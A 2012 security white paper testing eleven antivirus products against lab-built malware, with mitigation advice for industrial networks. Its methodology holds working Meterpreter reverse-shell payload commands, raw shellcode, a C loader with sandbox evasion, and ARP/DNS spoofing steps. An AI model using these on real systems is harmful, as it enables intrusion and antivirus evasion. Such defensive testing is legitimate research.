White paper about antivirus testing against attacks produced at TI Safe Labs using free tools downloaded from the Internet.

1. ANTIVIRUS SOLUTIONS ARE ENOUGH TO PROTECT
INDUSTRIAL PLANTS?
Jan Seidl 1
Marcelo Ayres Branquinho 2
Summary
Malware infections are becoming increasingly common in industries, leading in some cases to
loss of control and compromising key servers on the automation network. On the majority of
the contaminations investigated by us on our Brazilian clients there was in fact an anti-virus
solution installed on the hosts of the infected network and they weren’t able of detecting nor
deterring the threat infection and replication.
Anti-virus solutions analysis found on the internet and at specialized magazines evaluate the
infection prevention’s effectiveness of the solutions on personal computers or corporate
networks but aren’t an adequate base of comparison when choosing a prevention solution for
SCADA networks.
In order to better orient our clients about the anti-virus solution that would fit best on an
automation network, we decided to run an independent test, totally unbiased, without any
vendor connection, in order to determine the surface of threat protection given by each one of
the top market solutions.
This paper presents a series of tests realized at our laboratories aiming the measurement of
each antivirus solution’s efficacy against low and medium complexity attacks using open
source attack tools easily downloaded from the internet
Keywords: Antivirus, SCADA, Security, Malware, Attacks.
1 CTO at TI Safe Segurança da Informação Ltda, Brasil (http://br.linkedin.com/in/janseidl)
2 CEO at TI Safe Segurança da Informação Ltda, Brasil (http://br.linkedin.com/in/marcelobranquinho)

2. 1 INTRODUCTION
An increasing amount of Brazilian industries are facing serious trouble related to malware
infections on their automation plants, in some cases leading to loss of control, HMI freezing
and compromising key servers on the automation network.
In all cases in which we operated, automation networks had, at least on some servers,
antivirus solutions installed and updated, and they were not able to prevent them from
becoming infected and the infection from spreading throughout company’s automation
network, causing serious problems.
Looking at these cases in plants of Brazilian customers, our SCADA Security Division
decided to investigate independently and without any influence from any manufacturer, the
extent to which anti-virus solutions were being effective in detecting and combating threats in
automation networks
The topics that follow in this paper details the tests that were performed in the laboratory of
TI Safe in the city of Rio de Janeiro from 25 to 27 January 2012 and contains the results
obtained and the conclusions reached about, trying to answer a simple question: how an
antivirus solution is effective in protecting industrial networks?

3. 2 METHODOLOGY APPLIED
2.1 THE TESTING VIRTUAL NETWORK
Prior to performing the tests we configured a small test virtual network of whose architecture
is shown in the figure below:
Machine (a) – Victim
Virtual machine with Microsoft Windows 7 Enterprise 32bits operating system within Oracle
Virtual Box 3.2.8_OSE virtualization platform. After installing the operating system, the
machine received all security updates and patches through Windows Update. Were installed
Adobe Reader version 8.1.2 and Java Runtime Environment version 6 update 30 to serve as
vectors of infection to be explored in our tests. After completion of the virtual machine
configuration with the components listed above, we took a snapshot of the machine called
'Initial State' that will be used as a starting point for all tests.
Machine (b) – Apache Web Server (Fake intranet)
To simulate a virtual network with a corporate intranet, we set up an Apache web server on
another machine within Oracle Virtual Box 3.2.8_OSE. In the victim machine, there is an
Internet Explorer 9 browser with the home page configured to the URL of the Apache web
server (supposedly, the corporate intranet). This is a common configuration in enterprise
environments and during testing we cloned and injected malware to this site’s original html to
serve as an attack vector for social engineering.
Machine (c) – Attacker
The machine is an HP Pavilion DV6780se laptop with Backtrack Linux Version 4 with the
Metasploit Framework version 3 Community fully updated. The Metasploit Framework is a
framework for development and launch of exploits frequently used in penetration testing. The
framework consists of a series of tools, exploits and code snippets that can be used through
different interfaces.

4. 2.2 DESCRIPTION OF THE ATTACKS MADE
Samples used in the tests were in part generated by the Metasploit Framework, part injected
by web vectors, part reused from open source code injectors and part coded internally by TI
Safe’s SCADA security team in the lab.
The 16 malware samples used in the tests were the following:
1. “EICAR”: EICAR4 anti-virus test file
2. “Metasploit EXE Default Template (no encryption)”: Binary file generated by
Metasploit Framework with Meterpreter (MSF native interpreter) payload within
default binary template, without payload encryption.
# msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.106
LPORT=31337 R | msfencode -t exe -o sample2.exe -e generic/none
3. “Metasploit EXE Default Template (shikata_ga_nai)”: Binary file generated by
Metasploit Framework with Meterpreter (MSF native interpreter) payload within
default binary template with shikata_ga_nai payload encryption.
# msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.106
LPORT=31337 R | msfencode -t exe -o sample3.exe -e x86/shikata_ga_nai
4. “Metasploit EXE Notepad Template (no encryption)”: Binary file generated by
Metasploit Framework with Meterpreter (MSF native interpreter) payload within
Turkish Windows 7’s original Notepad (notepad.exe) as template, without payload
encryption.
# msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.106
LPORT=31337 R | msfencode -t exe -o sample4.exe -e generic/none -k -x
notepad_win7_turkish.exe
5. “Metasploit EXE Notepad Template (shikata_ga_nai)”: Binary file generated by
Metasploit Framework with Meterpreter (MSF native interpreter) payload within
Turkish Windows 7’s original Notepad (notepad.exe) as template, with shikata_ga_nai
payload encryption.
# msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.106
LPORT=31337 R | msfencode -t exe -o sample5.exe -e x86/shikata_ga_nai
-k -x notepad_win7_turkish.exe
6. “Metasploit EXE SkypePortable Template (shikata_ga_nai)”: Binary file generated by
Metasploit Framework with Meterpreter (MSF native interpreter) payload within
Skype Portable (SkypePortable_online.paf.exe) as template, with shikata_ga_nai
payload encryption.
# msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.106
LPORT=31337 R | msfencode -t exe -o sample6.exe -e x86/shikata_ga_nai
-k -x SkypePortable_online.paf.exe

5. 7. “Metasploit LOOP-VBS Default Template (no encryption)”: VBS script generated by
Metasploit Framework with Meterpreter (MSF native interpreter), without payload
encryption.
# msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.106
LPORT=31337 R | msfencode -t loop-vbs -o sample7.exe -e generic/none
8. “Metasploit LOOP-VBS Default Template (shikata_ga_nai)”: VBS script generated
by Metasploit Framework with Meterpreter (MSF native interpreter), with
shikata_ga_nai encryption.
# msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.106
LPORT=31337 R | msfencode -t loop-vbs -o sample8.exe -e
x86/shikata_ga_nai
9. “Shellcodexec Default w/ VBS launcher”: ShellcodeExec5 code injector with VBS
launcher and alphanumeric payload generated by MSF. The ShellCodeExec code
injector has no embedded payload and receives it as command-line argument. The
payload is generated though MSF:
# msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread
LHOST=10.1.1.106 LPORT=31337 R | msfencode -a x86 -e x86/alpha_mixed
-t raw BufferRegister=EAX
Output:
PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylxhniC0Wp30U0k9m
5EaJrRDnkRrFPlKrrFlLK3bdTLKcBWXDOLwCzWVP19ouaO0LlUlPaql6b6LQ0ja8OtM5Q
Jg8bxpqBSglKpRb0lKG2elFa8PnkqPt8K5IPD42jeQZpf0nkRhUHLK0XEpgqKckSWLcyL
KgDnkfaZvp1Yo6QkpLliQjoTMGqZg5hIp45KDGsqmXxwKsMtdBUJBPXLK1HetFaZsQvNk
TLBklKpXwlfaZsLKDDlKWqZpmYQTQ4vDCksk0aSicjPQkOM0BxSoSjNkUB8kk6cmrHecd
rwpS01xD7SC7BsoRt3XrlrWGVWwion5H8lPwq7puPfIo4V4bp3XTiopRKs0ioIE602p60
60spF0QPV0cX8jvoiOKPkOkeMGCZ6eu86jC1uQ1z58ERgpCJSYmY8fazR02vcgCXlYMut
4qq9ohUk5O0rT4LioPNgxBUXlBHXpoEmrsf9on5Qz5PRJfdCfCgSXfbXYKx3oYojuNkdv
2Jw0BHuP20S0c0cfrJ7p58bxNDccm5KOXUnsf3qzWpV63crwE8vbHYIX3o9oKeuQXCtiy
VNeL6SEzLxCAA
We create a VBS script to run the binary passing the payload as argument:
Set oShell = CreateObject("Wscript.shell")
sPath=Wscript.ScriptFullName
x=InstrRev(sPath, "")
sPath=Left(sPath,x)
sCmd = sPath+"scex32.exe
PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylxhniC0Wp30U0k9m
5EaJrRDnkRrFPlKrrFlLK3bdTLKcBWXDOLwCzWVP19ouaO0LlUlPaql6b6LQ0ja8OtM5Q
Jg8bxpqBSglKpRb0lKG2elFa8PnkqPt8K5IPD42jeQZpf0nkRhUHLK0XEpgqKckSWLcyL
KgDnkfaZvp1Yo6QkpLliQjoTMGqZg5hIp45KDGsqmXxwKsMtdBUJBPXLK1HetFaZsQvNk
TLBklKpXwlfaZsLKDDlKWqZpmYQTQ4vDCksk0aSicjPQkOM0BxSoSjNkUB8kk6cmrHecd
rwpS01xD7SC7BsoRt3XrlrWGVWwion5H8lPwq7puPfIo4V4bp3XTiopRKs0ioIE602p60
60spF0QPV0cX8jvoiOKPkOkeMGCZ6eu86jC1uQ1z58ERgpCJSYmY8fazR02vcgCXlYMut
4qq9ohUk5O0rT4LioPNgxBUXlBHXpoEmrsf9on5Qz5PRJfdCfCgSXfbXYKx3oYojuNkdv

6. 2Jw0BHuP20S0c0cfrJ7p58bxNDccm5KOXUnsf3qzWpV63crwE8vbHYIX3o9oKeuQXCtiy
VNeL6SEzLxCAA"
oShell.Run sCmd,0,False
10. “TI Safe Modded Shellcodeexec (w/ VBS launcher)”: ShellcodeExec code injector
modified by TI Safe with VBS launcher and alphanumeric payload generated by MSF.
We took ShellCodeExec’s source-code, changed all the function and variable names at
random (obfuscation) e and changed the execution flow path in order to avoid the anti-
virus software heuristics signature.
11. “TI Safe Modded Shellcodeexec (Custom EXE w/ embedded payload)”:
ShellcodeExec code injector modified by TI Safe with embedded alphanumeric
payload generated by MSF.
We removed the program’s argument passing (argv[1]) to the injector function and put
the payload from a char[] variable in place so get all the malware into a single file.
12. “TI Safe Custom Payload Launcher”: Code injector created at TI Safe laboratory with
embedded alphanumeric payload generated by MSF and rudimentary anti-virus
sandbox evasion system.
We built a small C program with a call to VirtualAlloc() with the flags:
PAGE_EXECUTE_READWRITE.
void* p = VirtualAlloc(NULL, PAYLOAD_SIZE, MEM_RESERVE |
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Copy the payload to the newly reserved memory area:
char payload[PAYLOAD_SIZE] =
“PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylxhniC0Wp30U0k9
m5EaJrRDnkRrFPlKrrFlLK3bdTLKcBWXDOLwCzWVP19ouaO0LlUlPaql6b6LQ0ja8OtM5
QJg8bxpqBSglKpRb0lKG2elFa8PnkqPt8K5IPD42jeQZpf0nkRhUHLK0XEpgqKckSWLcy
LKgDnkfaZvp1Yo6QkpLliQjoTMGqZg5hIp45KDGsqmXxwKsMtdBUJBPXLK1HetFaZsQvN
kTLBklKpXwlfaZsLKDDlKWqZpmYQTQ4vDCksk0aSicjPQkOM0BxSoSjNkUB8kk6cmrHec
drwpS01xD7SC7BsoRt3XrlrWGVWwion5H8lPwq7puPfIo4V4bp3XTiopRKs0ioIE602p6
060spF0QPV0cX8jvoiOKPkOkeMGCZ6eu86jC1uQ1z58ERgpCJSYmY8fazR02vcgCXlYMu
t4qq9ohUk5O0rT4LioPNgxBUXlBHXpoEmrsf9on5Qz5PRJfdCfCgSXfbXYKx3oYojuNkd
v2Jw0BHuP20S0c0cfrJ7p58bxNDccm5KOXUnsf3qzWpV63crwE8vbHYIX3o9oKeuQXCti
yVNeL6SEzLxCAA”;
char* pload_pointer = (char*) p;
char* x = payload;
int i;
for(i = 0; i < PAYLOAD_SIZE; i++)
*pload_pointer++ = *x++;
And run it:
(*(void (*)()) p)();
Finally, we added some functions to detect the behavior of some sandboxes and abort

7. the program with a clean exit (return 0) through timing analisis and function bypass
verification to reduce the number of solutions that could catch our virus by execution
tracing.
13. “Metasploit PDF (adobe_utilprintf)”: Meterpreter embedded into a PDF exploit
adobe_util.printf
14. “Metasploit PDF (adobe_pdf_embedded_exe)”: Meterpreter embedded into a PDF
exploit adobe_pdf_embedded_exe
15. “Metasploit PDF (adobe_pdf_embedded_exe_nojs)”: Meterpreter embedded into a
PDF exploit adobe_pdf_embedded_exe_nojs
16. “Metasploit Java Applet”: Meterpreter embedded into Java Applet through Web based
attack. We used SET9 (Social Engineering Toolkit) clone the intranet and inject the
java applet into its source-code.
From the main menu we choose: 1 (Social Engineering Attacks) → 2 (Website Attack
Vectors) → 1 (Java Applet Attack Method) → 2 (Website Cloner) → 13
(ShellCodeExec Alphanum Shellcode) → Windows Meterpreter Reverse Tcp
arpspoof10 was used to do a MITM (Man-in-the-middle) attack through com “Arp
Poisoning”. dnsspoof10 was also used to spoof the victim’s DNS requests redirecting
the traffic to the intranet to the attacker’s machine where the malicious website copy is
running from a lightweight python webserver..
Following, we open Internet Explorer 9 on the victim machine and wait for the
intranet site be automatically loaded as it is the configured start page. The browser
then requests the name resolution for the intranet URL and receives the spoofed IP
since the connection is poisoned and the requests are spoofed. The fake webpage is
loaded and a Java prompt presented asking if the user wants to run the component that
is indicated that was issued by the company.
By clicking in “Run”, the malware is executed.
In the attacking machine (Machine C), we load up Metasploit Framework Console
(msfconsole) and spawn meterpreter’s handler configured to persists multiple sessions
and automatically run our script to migrate to explorer.exe process and not end if the
user closes his browser. The browser on the victim machines hangs a bit then is
automatically redirected to the real website.
# msfconsole
msf > use multi/handler
msf exploit(multi/handler) > set PAYLOAD
windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 10.1.1.106
msf exploit(multi/handler) > set LPORT 31337
msf exploit(multi/handler) > set ExitOnSession false
msf exploit(multi/handler) > set AutoRunScript
/root/msf_scripts/migrate_to_explorer.rb

8. 2.3 TEST METHODS
The methodology used for the tests follows the sequence of steps detailed below:
a) Setting the victim machine with the antivirus solution to be tested: From the virtual
machine on your 'Initial State', install and configure the antivirus solution to be tested. After
installation, proceed with license registration (when available) and perform complete update
of the subscription base of antivirus solution. After this we obtained a new snapshot of the
machine called Protected State'.
All antivirus software tested (except the free ones) were obtained from the websites of their
manufacturers in their evaluation versions (32-bit) in English. All were installed on the
'Recommended' option.
Antivirus solutions tested were the following:
• McAfee Antivirus Plus 2012
• Kaspersky Antivirus 2012
• Panda Antivirus Pro 2012
• Trend Titanium Maximum Security 2012
• Norton Antivirus 2012
• F-Secure Antivirus 2012
• avast! Pro Antivirus 6
• AVG Anti-Virus FREE 2012
• Sophos Anti-Virus 7
• Microsoft Security Essentials
• E-SET NOD32 Antivirus 5
b) Execution of attack: the victim machine in 'Protected State' is submitted to the first
attack of the list and the results are noted.
c) Restoration of the victim machine: after the attack has been tested, the snapshot is
restored from the victim machine in 'Protected State' and the next attack is performed.
This sequence is repeated until all the attacks have been done with anti-virus testing.
Finished the tests for one antivirus, the same sequence will be repeated for the next
antivirus.

9. 3 RESULTS
The results were compiled into a matrix (Appendix A). From the analysis of this matrix was
observed that:
• The vast majority of detections were based on heuristics.
• The vast majority of antivirus solutions were not able to detect the threat in memory.
• Only two solutions reacted based on behavior: Sophos Antivirus 7 and Panda Antivirus
2012.
• None of the solutions that detected an attack was able to stop it.
• None of the solutions achieved the highest score.
• None of the solutions could detect more than one malware sample created into TI Safe´s
laboratory (attacks 10, 11 and 12).
• Some commercial products have not been able to detect any malware sample created into TI
Safe´s laboratory (fits 10, 11 and 12).
• In terms of heuristics, there are commercial solutions that underperformed the free solutions
and others that have equivalent performance.
• All candidates failed to prevent the attack by the Java applet (attack 16).
The detection rate by type of malware obtained in our tests was as follows:
Infections by malware type
Metasploit-
generated
binaries
Java Applet
Custom Detections by malware type
malware
PDF
Metasploit-
generated
binaries
Java Applet
Custom
malware
PDF

10. Malware detection ratio
100,00
90,00
80,00
70,00
60,00
50,00
40,00
30,00
20,00
10,00
0,00
Java Applet PDF
Metasploit-generated binaries Custom malware
Malware infection ratio
30
25
20
15
10
5
0
Java Applet PDF
Metasploit-generated binaries Custom malware
In a ranking from 0 (minimum) to 16 (maximum) possible points, the final ranking of
antivirus products tested were as follows:
# Product Score
F-Secure Antivirus 2012
1 13
Sophos Anti-Virus 7
McAfee Antivirus Plus 2012
Kaspersky Antivirus 2012
2 avast! Pro Antivirus 6 12
Microsoft Security Essentials
E-SET NOD32 Antivirus 5
3 Panda Antivirus Pro 2012 11
Norton Antivirus 2012
4 9
AVG Anti-Virus FREE 2012
5 Trend Titanium Maximum Security 8

11. 4 DISCUSSION
Can we trust on antivirus testing we read in magazines or found on the Internet?
A quick Internet search can find hundreds of journal articles with the analysis of antivirus
products, many containing detailed recommendations and opinions of experts based on
experience and most of use on home computers.
Due to this, it is difficult to rely on these tests when we need to protect a critical asset such as
an automation network. Moreover, much of the analysis is biased and seeks to encourage
antivirus vendors that sponsored.
A serious research should be based on a reliable methodology and have no commercial
interests involved. Some international organizations such as nonprofit AMTSO11 (Anti-
Malware Testing Standards Organization) provide test methods and extensive documentation
to improve the quality, objectivity and relevance in analyzes of antivirus solutions.
5 CONCLUSIONS
How effective is an antivirus solution to protect automation networks?
Most anti-virus technologies are based on the knowledge of the signatures of attacks, which is
great if you are fighting common threats like Confiker or Slammer, for example. Our tests
showed that when the malware is a little more sophisticated or exploits unknown Windows
vulnerabilities (zero-day), the antivirus solutions do little to defend the system.
We're not just talking about sophisticated cyber weapons such as Stuxnet and DuQu, but less
sophisticated attacks that script-kiddies can perform with the aid of attack tools downloaded
from the Internet.
Our study showed that no antivirus solution is able to provide full protection for automation
networks and lead companies to have a "false sense of security", believing they are safe while
the network may be infested with malware, suffering attacks ranging from industrial
espionage until the control of their systems by external attackers.
If a security expert says that SCADA systems can be protected using only antivirus solutions,
he may be committing a grave error and undermining the productivity of your company.
Antivirus products are recommended, but do not provide all necessary security in control
systems networks.
Our recommendation for a more secure automation network is the use of compensating
controls beyond antivirus solution. These controls will protect the network against attacks
before they even infect the control network.
The segmentation of the automation network according to the ANSI/ISA-99 standard (the
zones and conduits12 model) is very important and should be done. At the entrance to each
security zone there should be safety equipment such as edge firewalls and intrusion detection
and prevention systems (IDPSs) configured with SCADA signatures.

12. A good review of the existing firewall rules that protect the automation network (driven by
industry best practices), tight control over any device that is connected to the SCADA
network (third party laptops, removable media, modems, etc.) and deep inspection of new
programs before they are installed can dramatically increase the level of safety and prevent
infections.
Some practices should be the rule in automation networks. Do not allow the use of email and
web access within the automation network and, as far as possible, update the security patches
of the most critical computers, are extremely desirable. All security solutions installed and
configured on the automation network should unite their logs into a single database managed
by a good SIEM (Security Information and Event Management) solution, which will alert the
security team at the slightest sign of a security incident.
In addition to preventing, companies should be prepared for the worst case and have a
contingency plan in case anything goes wrong and the plant automation gets infected. It is
essential to have automated backup tools installed as well as redundancy in critical servers of
the automation network. Our experience shows that the process of disinfecting a contaminated
automation network is quite costly, complex and depends on the cooperation of manufacturers
for success, which makes the process slow. We encourage the international community to
create a guide of good practices for the disinfection of an automation plan. This guide will
serve as a baseline to be followed by companies that are experiencing this problem to regain
control over their SCADA systems in a planned and preferably rapid manner.

13. REFERENCES ON THE INTERNET
1 http://www.tisafe.com/solucoes/seguranca-scada/
2 http://www.backtrack-linux.org/
3 http://www.metasploit.com/
4 http://www.eicar.org/86-0-Intended-use.html
5 https://github.com/inquisb/shellcodeexec
6 http://www.metasploit.com/modules/exploit/windows/browser/adobe_utilprintf
7 http://www.metasploit.com/modules/exploit/windows/fileformat/adobe_pdf_embedded_exe
8 http://www.metasploit.com/modules/exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
9 http://www.social-
engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_(SET)
10 http://monkey.org/~dugsong/dsniff/
11 http://www.amtso.org
12 http://www.slideshare.net/tisafe/apresentao-tcnica-segurana-scada-realizada-no-isa-show-2011

14. APPENDIX A – MATRIX OF TEST RESULTS
McAfee Antivirus Plus Kaspersky Antivirus Panda Antivirus Pro Trend Titanium AVG Anti-Virus FREE Microsoft Security
Norton Antivirus 2012 F-Secure Antivirus 2012 avast! Pro Antivirus 6 Sophos Anti-Virus 7 E-SET NOD32 Antivirus 5
2012 2012 2012 Maximum Security 2012 Essentials
EICAR EICAR test file EICAR-Test-File EICAR-AV-TEST-FILE Eicar_test_file EICAR Test String Trojan.Generic.6567028 EICAR Test-NOT virus!!! EICAR_Test EICAR-AV-Test DOS/EICAR_Test_File Eicar test file
Metasploit EXE Default Template (no a variant of Win32/Rozena.AA
Swrort.f Trojan.Win32.Generic Suspicious File TROJ_SWRORT.SME Packed.Generic.347 Backdoor.Shell.AC Win32:SwPatch Win32/Heur Mal/EncPk-ACE Trojan.Win32/Swrort.A
encryption) trojan
Metasploit EXE Default Template a variant of Win32/Rozena.AH
Swrort.d Trojan.Win32.Generic Suspicious File TROJ_SWRORT.SME Packed.Generic.347 Backdoor.Shell.AC Win32:SwPatch Win32/Heur Mal/Swrort-C Trojan.Win32/Swrort.A
(shikata_ga_nai) trojan
Metasploit EXE Notepad Template (no a variant of Win32/Rozena.AA
Swrort.f Trojan.Win32.Generic Trj/Genetic.gen - - Backdoor.Shell.AC Win32:SwPatch - Mal/Swrort-C Trojan.Win32/Swrort.A
encryption) trojan
Metasploit EXE Notepad Template a variant of Win32/Rozena.AH
Swrort.d Trojan.Win32.Generic Trj/Genetic.gen - - Backdoor.Shell.AC Win32:SwPatch Win32/Heur Mal/Swrort-C Trojan.Win32/Swrort.A
(shikata_ga_nai) trojan
Metasploit EXE SkypePortable Template a variant of Win32/Rozena.AH
Swrort.d Trojan.Win32.Generic - - - Backdoor.Shell.AC Win32:SwPatch - Mal/Swrort-C Trojan.Win32/Swrort.A
(shikata_ga_nai) trojan
Metasploit LOOP-VBS Default Template a variant of Win32/Rozena.AA
Swrort.f Trojan.Win32.Generic Script Blocked TROJ_SWRORT.SME Packed.Generic.347 Backdoor.Shell.AC Win32:SwPatch - Mal/Swrort-C Trojan.Win32/Swrort.A
(no encryption) trojan
Metasploit LOOP-VBS Default Template a variant of Win32/Rozena.AH
Swrort.f Trojan.Win32.Generic Script Blocked TROJ_SWRORT.SME Packed.Generic.347 Backdoor.Shell.AC Win32:SwPatch - Mal/Swrort-C Trojan.Win32/Swrort.A
(shikata_ga_nai) trojan
Trojan.Win32.Genome Win32/ShellcodeRunner.A
Shellcodexec Default w/ VBS launcher Generic.tfr!i Trj/CI.A - Trojan.Gen Trojan.Generic.6567028 Win32:Malware-gen Trojan Generic22.KPM Mal/Generic.L -
.vrrg trojan
TI Safe Modded Shellcodeexec (w/ VBS
- - Script Blocked - - - - - - - -
launcher)
TI Safe Modded Shellcodeexec (Custom
- - - - - Backdoor.Shell.AC - Trojan Generic22.SND - Trojan.Win32/Swrort.A -
EXE w/ embedded payload)
TI Safe Custom Payload Launcher - - - - - - - - Mal/FakeAV-FS - -
Bloodhound.Exploit.21
Metasploit PDF (adobe_utilprintf) Exploit.PDF.bk.gen Exploit.JS.Pdfka.cil - HEUR_PDFEXP.B Exploit.PDF-JS.Gen JS:Pdfka-gen Script/Exploit Troj/PDFJs-B Trojan.Win32/Swrort.A JS/Exploit.Pdfka.NOO trojan
3
Metasploit PDF
Swrort.f Trojan.Win32.Generic Suspicious File TROJ_SWRORT.SME Bloodhound.PDF.24 Exploit.PDF-Dropper.Gen Win32:SwPatch Exploit.PDF Mal/Swrort-C Trojan.Win32/Swrort.A PDF/Exploit.Pidief.PFW trojan
(adobe_pdf_embedded_exe)
Metasploit PDF
Swrort.f Trojan.Win32.Generic Suspicious File TROJ_PIDIEF.SMEO Bloodhound.PDF.24 Exploit.PDF-Dropper.Gen PDF:Launchr-C Exploit Mal/Swrort-C Trojan.Win32/Swrort.A PDF/Exploit.Pidief.PFT trojan
(adobe_pdf_embedded_exe_nojs)
Metasploit Java Applet - - - - - - - - - - -
Note: the cells of the matrix with content in red indicate the signatures of attacks that were detected by antivirus solution tested. Empty cells indicate that the
antivirus solution was not able to detect the attack and consequently that it succeeded.